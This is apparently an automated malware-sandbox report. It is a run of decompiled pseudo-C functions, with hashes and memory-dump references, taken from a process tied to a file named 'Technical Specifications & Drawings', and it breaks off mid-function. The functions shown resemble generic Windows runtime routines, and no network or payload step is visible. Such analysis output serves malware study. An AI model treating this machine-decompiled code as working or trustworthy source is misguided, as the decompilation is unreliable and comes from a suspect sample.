                                                  • Opcode Fuzzy Hash: f536817d6eccad8f0af131d6f7deb9d50f8262b3f2bb787ccde88b3ce5c5e322
                                                  • Instruction Fuzzy Hash: 48416AB5A00219DFCB15CF68C890B99BBF5FB89314F1980ADE905EB348C775AA01CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E017CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                  				signed int* _v8;
                                                  				char _v16;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed char _t33;
                                                  				signed char _t43;
                                                  				signed char _t48;
                                                  				signed char _t62;
                                                  				void* _t63;
                                                  				intOrPtr _t69;
                                                  				intOrPtr _t71;
                                                  				unsigned int* _t82;
                                                  				void* _t83;
                                                  
                                                  				_t80 = __ecx;
                                                  				_t82 = __edx;
                                                  				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                  				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                  				if((_t33 & 0x00000001) != 0) {
                                                  					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                  					if(E017C7D50() != 0) {
                                                  						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  					} else {
                                                  						_t43 = 0x7ffe0386;
                                                  					}
                                                  					if( *_t43 != 0) {
                                                  						_t43 = E01878D34(_v8, _t80);
                                                  					}
                                                  					E017C2280(_t43, _t82);
                                                  					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                  						E017BFFB0(_t62, _t80, _t82);
                                                  						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                  						_t30 = _t80 + 0xd0; // 0xd0
                                                  						_t83 = _t30;
                                                  						E01878833(_t83,  &_v16);
                                                  						_t81 = _t80 + 0x90;
                                                  						E017BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                  						_t63 = 0;
                                                  						_push(0);
                                                  						_push(_t83);
                                                  						_t48 = E017EB180();
                                                  						if(_a4 != 0) {
                                                  							E017C2280(_t48, _t81);
                                                  						}
                                                  					} else {
                                                  						_t69 = _v8;
                                                  						_t12 = _t80 + 0x98; // 0x98
                                                  						_t13 = _t69 + 0xc; // 0x575651ff
                                                  						E017CBB2D(_t13, _t12);
                                                  						_t71 = _v8;
                                                  						_t15 = _t80 + 0xb0; // 0xb0
                                                  						_t16 = _t71 + 8; // 0x8b000cc2
                                                  						E017CBB2D(_t16, _t15);
                                                  						E017CB944(_v8, _t62);
                                                  						 *((char*)(_t80 + 0xdc)) = 0;
                                                  						E017BFFB0(0, _t80, _t82);
                                                  						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                  						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                  						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                  						 *(_t80 + 0xde) = 0;
                                                  						if(_a4 == 0) {
                                                  							_t25 = _t80 + 0x90; // 0x90
                                                  							E017BFFB0(0, _t80, _t25);
                                                  						}
                                                  						_t63 = 1;
                                                  					}
                                                  					return _t63;
                                                  				}
                                                  				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                  				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                  				if(_a4 == 0) {
                                                  					_t24 = _t80 + 0x90; // 0x90
                                                  					E017BFFB0(0, __ecx, _t24);
                                                  				}
                                                  				return 0;
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction ID: 651427cf4f17ac4ee1b52836db1c89d57c7ecf04e3144d98658f29d459441438
                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction Fuzzy Hash: FD3168B2A0558BBFD706EBB8C884BE9FB55BF52700F04415ED51C87206CB34AA05CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E01827016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                  				signed int _v8;
                                                  				char _v588;
                                                  				intOrPtr _v592;
                                                  				intOrPtr _v596;
                                                  				signed short* _v600;
                                                  				char _v604;
                                                  				short _v606;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed short* _t55;
                                                  				void* _t56;
                                                  				signed short* _t58;
                                                  				signed char* _t61;
                                                  				char* _t68;
                                                  				void* _t69;
                                                  				void* _t71;
                                                  				void* _t72;
                                                  				signed int _t75;
                                                  
                                                  				_t64 = __edx;
                                                  				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                  				_v8 =  *0x189d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                  				_t55 = _a16;
                                                  				_v606 = __ecx;
                                                  				_t71 = 0;
                                                  				_t58 = _a12;
                                                  				_v596 = __edx;
                                                  				_v600 = _t58;
                                                  				_t68 =  &_v588;
                                                  				if(_t58 != 0) {
                                                  					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                  					if(_t55 != 0) {
                                                  						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                  					}
                                                  				}
                                                  				_t8 = _t71 + 0x2a; // 0x28
                                                  				_t33 = _t8;
                                                  				_v592 = _t8;
                                                  				if(_t71 <= 0x214) {
                                                  					L6:
                                                  					 *((short*)(_t68 + 6)) = _v606;
                                                  					if(_t64 != 0xffffffff) {
                                                  						asm("cdq");
                                                  						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                  						 *((char*)(_t68 + 0x28)) = _a4;
                                                  						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                  						 *((char*)(_t68 + 0x29)) = _a8;
                                                  						if(_t71 != 0) {
                                                  							_t22 = _t68 + 0x2a; // 0x2a
                                                  							_t64 = _t22;
                                                  							E01826B4C(_t58, _t22, _t71,  &_v604);
                                                  							if(_t55 != 0) {
                                                  								_t25 = _v604 + 0x2a; // 0x2a
                                                  								_t64 = _t25 + _t68;
                                                  								E01826B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                  							}
                                                  							if(E017C7D50() == 0) {
                                                  								_t61 = 0x7ffe0384;
                                                  							} else {
                                                  								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  							}
                                                  							_push(_t68);
                                                  							_push(_v592 + 0xffffffe0);
                                                  							_push(0x402);
                                                  							_push( *_t61 & 0x000000ff);
                                                  							E017E9AE0();
                                                  						}
                                                  					}
                                                  					_t35 =  &_v588;
                                                  					if( &_v588 != _t68) {
                                                  						_t35 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                  					}
                                                  					L16:
                                                  					_pop(_t69);
                                                  					_pop(_t72);
                                                  					_pop(_t56);
                                                  					return E017EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                  				}
                                                  				_t68 = L017C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                  				if(_t68 == 0) {
                                                  					goto L16;
                                                  				} else {
                                                  					_t58 = _v600;
                                                  					_t64 = _v596;
                                                  					goto L6;
                                                  				}
                                                  			}























                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cd019f7c27100d48834f91ce61dec8013d4e7cbd1c30d42a99cb818f3b62bc1
                                                  • Instruction ID: c4a826e46cb29eb0acf4a26bcfe4f48d75d8c8f25ffc7a56e093a568fc29b8f1
                                                  • Opcode Fuzzy Hash: 8cd019f7c27100d48834f91ce61dec8013d4e7cbd1c30d42a99cb818f3b62bc1
                                                  • Instruction Fuzzy Hash: 3131E4726047619BC321DF2DC840A6AB7E5BF98700F144A2DF995C7694E730EA44CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E017DA70E(intOrPtr* __ecx, char* __edx) {
                                                  				unsigned int _v8;
                                                  				intOrPtr* _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t16;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t28;
                                                  				char* _t33;
                                                  				intOrPtr _t37;
                                                  				intOrPtr _t38;
                                                  				void* _t50;
                                                  				intOrPtr _t52;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t52 =  *0x1897b10; // 0x0
                                                  				_t33 = __edx;
                                                  				_t48 = __ecx;
                                                  				_v12 = __ecx;
                                                  				if(_t52 == 0) {
                                                  					 *0x1897b10 = 8;
                                                  					 *0x1897b14 = 0x1897b0c;
                                                  					 *0x1897b18 = 1;
                                                  					L6:
                                                  					_t2 = _t52 + 1; // 0x1
                                                  					E017DA990(0x1897b10, _t2, 7);
                                                  					asm("bts ecx, eax");
                                                  					 *_t48 = _t52;
                                                  					 *_t33 = 1;
                                                  					L3:
                                                  					_t16 = 0;
                                                  					L4:
                                                  					return _t16;
                                                  				}
                                                  				_t17 = L017DA840(__edx, __ecx, __ecx, _t52, 0x1897b10, 1, 0);
                                                  				if(_t17 == 0xffffffff) {
                                                  					_t37 =  *0x1897b10; // 0x0
                                                  					_t3 = _t37 + 0x27; // 0x27
                                                  					__eflags = _t3 >> 5 -  *0x1897b18; // 0x0
                                                  					if(__eflags > 0) {
                                                  						_t38 =  *0x1897b9c; // 0x0
                                                  						_t4 = _t52 + 0x27; // 0x27
                                                  						_v8 = _t4 >> 5;
                                                  						_t50 = L017C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                  						__eflags = _t50;
                                                  						if(_t50 == 0) {
                                                  							_t16 = 0xc0000017;
                                                  							goto L4;
                                                  						}
                                                  						 *0x1897b18 = _v8;
                                                  						_t8 = _t52 + 7; // 0x7
                                                  						E017EF3E0(_t50,  *0x1897b14, _t8 >> 3);
                                                  						_t28 =  *0x1897b14; // 0x0
                                                  						__eflags = _t28 - 0x1897b0c;
                                                  						if(_t28 != 0x1897b0c) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                  						}
                                                  						_t9 = _t52 + 8; // 0x8
                                                  						 *0x1897b14 = _t50;
                                                  						_t48 = _v12;
                                                  						 *0x1897b10 = _t9;
                                                  						goto L6;
                                                  					}
                                                  					 *0x1897b10 = _t37 + 8;
                                                  					goto L6;
                                                  				}
                                                  				 *__ecx = _t17;
                                                  				 *_t33 = 0;
                                                  				goto L3;
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9d3cd8940d23b8f30d80fd407af665c280ce6ed9d623bafa43138c4d15106d5
                                                  • Instruction ID: 12611f48301bc5f0936f218d90ad374bfc3bffdc736f3ed2d6f3bc7f8f3566b3
                                                  • Opcode Fuzzy Hash: b9d3cd8940d23b8f30d80fd407af665c280ce6ed9d623bafa43138c4d15106d5
                                                  • Instruction Fuzzy Hash: 41318DB17242099FD721CB18D890F69BBF9FB95710F19499AE206D7248D7B0AA01CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E017D61A0(signed int* __ecx) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr* _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _t30;
                                                  				intOrPtr _t31;
                                                  				void* _t32;
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t37;
                                                  				intOrPtr _t49;
                                                  				signed int _t51;
                                                  				intOrPtr _t52;
                                                  				signed int _t54;
                                                  				void* _t59;
                                                  				signed int* _t61;
                                                  				intOrPtr* _t64;
                                                  
                                                  				_t61 = __ecx;
                                                  				_v12 = 0;
                                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                  				_v16 = __ecx;
                                                  				_v8 = 0;
                                                  				if(_t30 == 0) {
                                                  					L6:
                                                  					_t31 = 0;
                                                  					L7:
                                                  					return _t31;
                                                  				}
                                                  				_t32 = _t30 + 0x5d8;
                                                  				if(_t32 == 0) {
                                                  					goto L6;
                                                  				}
                                                  				_t59 = _t32 + 0x30;
                                                  				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                  					goto L6;
                                                  				}
                                                  				if(__ecx != 0) {
                                                  					 *((intOrPtr*)(__ecx)) = 0;
                                                  					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                  				}
                                                  				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                  					_t51 =  *(_t32 + 0x10);
                                                  					_t33 = _t32 + 0x10;
                                                  					_v20 = _t33;
                                                  					_t54 =  *(_t33 + 4);
                                                  					if((_t51 | _t54) == 0) {
                                                  						_t37 = E017D5E50(0x17867cc, 0, 0,  &_v12);
                                                  						if(_t37 != 0) {
                                                  							goto L6;
                                                  						}
                                                  						_t52 = _v8;
                                                  						asm("lock cmpxchg8b [esi]");
                                                  						_t64 = _v16;
                                                  						_t49 = _t37;
                                                  						_v20 = 0;
                                                  						if(_t37 == 0) {
                                                  							if(_t64 != 0) {
                                                  								 *_t64 = _v12;
                                                  								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                  							}
                                                  							E01879D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                  							_t31 = 1;
                                                  							goto L7;
                                                  						}
                                                  						E017AF7C0(_t52, _v12, _t52, 0);
                                                  						if(_t64 != 0) {
                                                  							 *_t64 = _t49;
                                                  							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                  						}
                                                  						L12:
                                                  						_t31 = 1;
                                                  						goto L7;
                                                  					}
                                                  					if(_t61 != 0) {
                                                  						 *_t61 = _t51;
                                                  						_t61[1] = _t54;
                                                  					}
                                                  					goto L12;
                                                  				} else {
                                                  					goto L6;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12c913813e41327f6de5c6e4bc41f3d6194facb6b291409535e22ee2ce9e231d
                                                  • Instruction ID: df32566edd50ba5109a68123f672bc4171585d868a7e420195a64bcb1024a90c
                                                  • Opcode Fuzzy Hash: 12c913813e41327f6de5c6e4bc41f3d6194facb6b291409535e22ee2ce9e231d
                                                  • Instruction Fuzzy Hash: E8315A726093018FE320DF1DC800B2AFBE8EB88B10F05496DFA99DB255E771E944CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E017AAA16(signed short* __ecx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				signed short _v16;
                                                  				intOrPtr _v20;
                                                  				signed short _v24;
                                                  				signed short _v28;
                                                  				void* _v32;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t25;
                                                  				signed short _t38;
                                                  				signed short* _t42;
                                                  				signed int _t44;
                                                  				signed short* _t52;
                                                  				signed short _t53;
                                                  				signed int _t54;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t54;
                                                  				_t42 = __ecx;
                                                  				_t44 =  *__ecx & 0x0000ffff;
                                                  				_t52 =  &(__ecx[2]);
                                                  				_t51 = _t44 + 2;
                                                  				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                  					L4:
                                                  					_t25 =  *0x1897b9c; // 0x0
                                                  					_t53 = L017C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                  					__eflags = _t53;
                                                  					if(_t53 == 0) {
                                                  						L3:
                                                  						return E017EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                  					} else {
                                                  						E017EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                  						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  						L2:
                                                  						_t51 = 4;
                                                  						if(L017B6C59(_t53, _t51, _t58) != 0) {
                                                  							_t28 = E017D5E50(0x178c338, 0, 0,  &_v32);
                                                  							__eflags = _t28;
                                                  							if(_t28 == 0) {
                                                  								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                  								__eflags = _t38;
                                                  								_v24 = _t53;
                                                  								_v16 = _t38;
                                                  								_v20 = 0;
                                                  								_v12 = 0;
                                                  								E017DB230(_v32, _v28, 0x178c2d8, 1,  &_v24);
                                                  								_t28 = E017AF7A0(_v32, _v28);
                                                  							}
                                                  							__eflags = _t53 -  *_t52;
                                                  							if(_t53 !=  *_t52) {
                                                  								_t28 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                  							}
                                                  						}
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				_t53 =  *_t52;
                                                  				_t44 = _t44 >> 1;
                                                  				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                  				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                  					goto L4;
                                                  				}
                                                  				goto L2;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12f4b2183ac115bd32120c4cab68c0fa0e8eb352132b2e8d53783c1372cf1585
                                                  • Instruction ID: e34d28fe0137520ddbb687490464008aaa2cd3f39b3a79dfd5fdb68587d2f0fd
                                                  • Opcode Fuzzy Hash: 12f4b2183ac115bd32120c4cab68c0fa0e8eb352132b2e8d53783c1372cf1585
                                                  • Instruction Fuzzy Hash: E531E571A0061AABCF11AF68CD85ABFF7B8EF44700B41406DF901E7144E7349E11CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E017E8EC7(void* __ecx, void* __edx) {
                                                  				signed int _v8;
                                                  				signed int* _v16;
                                                  				intOrPtr _v20;
                                                  				signed int* _v24;
                                                  				char* _v28;
                                                  				signed int* _v32;
                                                  				intOrPtr _v36;
                                                  				signed int* _v40;
                                                  				signed int* _v44;
                                                  				signed int* _v48;
                                                  				intOrPtr _v52;
                                                  				signed int* _v56;
                                                  				signed int* _v60;
                                                  				signed int* _v64;
                                                  				intOrPtr _v68;
                                                  				signed int* _v72;
                                                  				char* _v76;
                                                  				signed int* _v80;
                                                  				signed int _v84;
                                                  				signed int* _v88;
                                                  				intOrPtr _v92;
                                                  				signed int* _v96;
                                                  				intOrPtr _v100;
                                                  				signed int* _v104;
                                                  				signed int* _v108;
                                                  				char _v140;
                                                  				signed int _v144;
                                                  				signed int _v148;
                                                  				signed int* _v152;
                                                  				char _v156;
                                                  				signed int* _v160;
                                                  				char _v164;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t67;
                                                  				intOrPtr _t70;
                                                  				void* _t71;
                                                  				void* _t72;
                                                  				signed int _t73;
                                                  
                                                  				_t69 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t73;
                                                  				_t48 =  *[fs:0x30];
                                                  				_t72 = __edx;
                                                  				_t71 = __ecx;
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                  					_t48 = E017D4E70(0x18986e4, 0x17e9490, 0, 0);
                                                  					if( *0x18953e8 > 5 && E017E8F33(0x18953e8, 0, 0x2000) != 0) {
                                                  						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                  						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                  						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                  						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                  						_v108 =  &_v84;
                                                  						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                  						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                  						_v76 =  &_v156;
                                                  						_t70 = 8;
                                                  						_v60 =  &_v144;
                                                  						_t67 = 4;
                                                  						_v44 =  &_v148;
                                                  						_v152 = 0;
                                                  						_v160 = 0;
                                                  						_v104 = 0;
                                                  						_v100 = 2;
                                                  						_v96 = 0;
                                                  						_v88 = 0;
                                                  						_v80 = 0;
                                                  						_v72 = 0;
                                                  						_v68 = _t70;
                                                  						_v64 = 0;
                                                  						_v56 = 0;
                                                  						_v52 = 0x18953e8;
                                                  						_v48 = 0;
                                                  						_v40 = 0;
                                                  						_v36 = 0x18953e8;
                                                  						_v32 = 0;
                                                  						_v28 =  &_v164;
                                                  						_v24 = 0;
                                                  						_v20 = _t70;
                                                  						_v16 = 0;
                                                  						_t69 = 0x178bc46;
                                                  						_t48 = E01827B9C(0x18953e8, 0x178bc46, _t67, 0x18953e8, _t70,  &_v140);
                                                  					}
                                                  				}
                                                  				return E017EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b51354d830514e69cdcf087536c707eb38d01c83bd5654c4f77fe5565f77609
                                                  • Instruction ID: 770a2bbcd710e1a9e5aadb4681ead03f89b547c3661370159ef7d24c48fc4218
                                                  • Opcode Fuzzy Hash: 9b51354d830514e69cdcf087536c707eb38d01c83bd5654c4f77fe5565f77609
                                                  • Instruction Fuzzy Hash: 7A418FB1D002189FDB20CFAAD985AADFBF4FB49710F5041AEE549E7240E7745A84CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E017DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                  				intOrPtr* _v0;
                                                  				signed char _v4;
                                                  				signed int _v8;
                                                  				void* __ecx;
                                                  				void* __ebp;
                                                  				void* _t37;
                                                  				intOrPtr _t38;
                                                  				signed int _t44;
                                                  				signed char _t52;
                                                  				void* _t54;
                                                  				intOrPtr* _t56;
                                                  				void* _t58;
                                                  				char* _t59;
                                                  				signed int _t62;
                                                  
                                                  				_t58 = __edx;
                                                  				_push(0);
                                                  				_push(4);
                                                  				_push( &_v8);
                                                  				_push(0x24);
                                                  				_push(0xffffffff);
                                                  				if(E017E9670() < 0) {
                                                  					E017FDF30(_t54, _t58, _t35);
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					_push(_t54);
                                                  					_t52 = _v4;
                                                  					if(_t52 > 8) {
                                                  						_t37 = 0xc0000078;
                                                  					} else {
                                                  						_t38 =  *0x1897b9c; // 0x0
                                                  						_t62 = _t52 & 0x000000ff;
                                                  						_t59 = L017C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                  						if(_t59 == 0) {
                                                  							_t37 = 0xc0000017;
                                                  						} else {
                                                  							_t56 = _v0;
                                                  							 *(_t59 + 1) = _t52;
                                                  							 *_t59 = 1;
                                                  							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                  							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                  							_t44 = _t62 - 1;
                                                  							if(_t44 <= 7) {
                                                  								switch( *((intOrPtr*)(_t44 * 4 +  &M017DE810))) {
                                                  									case 0:
                                                  										L6:
                                                  										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                  										goto L7;
                                                  									case 1:
                                                  										L13:
                                                  										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                  										goto L6;
                                                  									case 2:
                                                  										L12:
                                                  										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                  										goto L13;
                                                  									case 3:
                                                  										L11:
                                                  										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                  										goto L12;
                                                  									case 4:
                                                  										L10:
                                                  										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                  										goto L11;
                                                  									case 5:
                                                  										L9:
                                                  										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                  										goto L10;
                                                  									case 6:
                                                  										L17:
                                                  										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                  										goto L9;
                                                  									case 7:
                                                  										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                  										goto L17;
                                                  								}
                                                  							}
                                                  							L7:
                                                  							 *_a40 = _t59;
                                                  							_t37 = 0;
                                                  						}
                                                  					}
                                                  					return _t37;
                                                  				} else {
                                                  					_push(0x20);
                                                  					asm("ror eax, cl");
                                                  					return _a4 ^ _v8;
                                                  				}
                                                  			}


















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ab2d829ac3ace1c97a4b89afede2d41318c1e6591e1a7c471c5410253dc1849
                                                  • Instruction ID: 300e18d938d4d6835bd12b17433ba0fb3c5adacbf3230d274ae24d9f5cf93ef6
                                                  • Opcode Fuzzy Hash: 1ab2d829ac3ace1c97a4b89afede2d41318c1e6591e1a7c471c5410253dc1849
                                                  • Instruction Fuzzy Hash: 62318E75A14249EFD745CF58C845B9AFBF4FB08324F15825AFA04CB341DA31E980CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E017DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				intOrPtr _t22;
                                                  				intOrPtr* _t41;
                                                  				intOrPtr _t51;
                                                  
                                                  				_t51 =  *0x1896100; // 0x5
                                                  				_v12 = __edx;
                                                  				_v8 = __ecx;
                                                  				if(_t51 >= 0x800) {
                                                  					L12:
                                                  					return 0;
                                                  				} else {
                                                  					goto L1;
                                                  				}
                                                  				while(1) {
                                                  					L1:
                                                  					_t22 = _t51;
                                                  					asm("lock cmpxchg [ecx], edx");
                                                  					if(_t51 == _t22) {
                                                  						break;
                                                  					}
                                                  					_t51 = _t22;
                                                  					if(_t22 < 0x800) {
